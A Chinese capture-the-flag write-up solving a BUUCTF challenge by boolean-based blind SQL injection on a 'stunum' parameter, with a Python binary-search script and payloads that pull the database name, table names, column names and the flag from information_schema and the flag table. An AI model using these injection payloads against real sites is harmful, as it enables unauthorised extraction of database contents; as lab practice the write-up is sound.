访问页面;
分别输入1,2,3,4,为4个不同的结果,根据提示猜测应该是SQL注入;
在测试了各种类型的注入后,锁定为布尔注入;
首先输入
if(length(database()>1,1,0)
输出了stunum=1的结果;
当输入
if(length(database()>10,1,0)
则输出了stunum=0的结果;
这样我们就可以写脚本;
import requests
import time
flag = ""
for i in range(1, 100):
low = 32
high = 128
mid = (low + high) // 2
while low < high:
payload = 'http://70ea63cb-647e-4954-b2f7-a7fa97366c0a.node3.buuoj.cn/?stunum=1^(ascii(substr(database(),%d,1))>%d)' %(i,mid)
res = requests.get(payload)
if 'student number not exists' in res.text:
low = mid + 1
else:
high = mid
mid = (low + high) // 2
time.sleep(0.1)
if (mid == 32 or mid == 127):
break
flag = flag + chr(mid)
print(flag)
其实数据库不需要跑出来,但是熟悉一下最简单的布尔注入条件语句还是挺好的;
数据库跑出来了;
ctf
然后,换个跑表名的payload;
payload = url + '1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),%d,1))>%d)' %(i,mid)
表明出来了;
flag,score
score
我是不想看里头有什么东西了,直奔主题去看flag
有什么;
换个跑列名的paylaod;
payload = url +"1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='flag')),%d,1))>%d)" % (i, mid)
出来了两个列;
flag,value
再看看里面的值;
payload = url + "1^(ascii(substr((select(group_concat(flag,0x2b,value))from(flag)),%d,1))>%d)" % (i, mid)
得到flag;
flag{7493a4ec-a8d9-44c3-884f-2283c4857b1c}